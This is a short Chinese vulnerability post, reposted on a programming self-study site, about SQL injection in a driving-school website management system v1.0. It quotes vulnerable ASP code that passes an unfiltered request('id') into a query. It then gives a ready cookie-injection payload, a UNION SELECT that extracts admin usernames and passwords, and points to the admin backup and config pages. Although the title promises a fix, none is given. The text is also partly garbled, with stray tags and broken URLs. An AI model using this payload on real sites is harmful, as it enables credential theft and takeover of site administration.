好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

驾校培训网站管理系统 v1.0 漏洞及修复 - 网站安

 

<% 

Set rsnews=Server.CreateObject("ADODB.RecordSet") 

sql="update news set hits=hits+1 where id="&cstr(request("id"))

conn.execute sql

 

 

 

*/

单纯的reuqest(),并没用指定是request.querystring(),还是request.form,或request.cookie ().

 

利用:

 

http://HdhCmsTest2cto测试数据 /jiaxiao/shownews. asp

 

javascript:alert(document.cookie="id="+escape("107 and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11 from admin"))

 

后台admin/login.asp有备份,和修改配置文件

 

by 缘份

查看更多关于驾校培训网站管理系统 v1.0 漏洞及修复 - 网站安的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did11322
  阅读:39次

上一篇: ideacms文章管理系统漏洞及修复 - 网站安全 - 自学

下一篇:最新DZ 7.2爆路径0day及修复 - 网站安全 - 自学php

相关资讯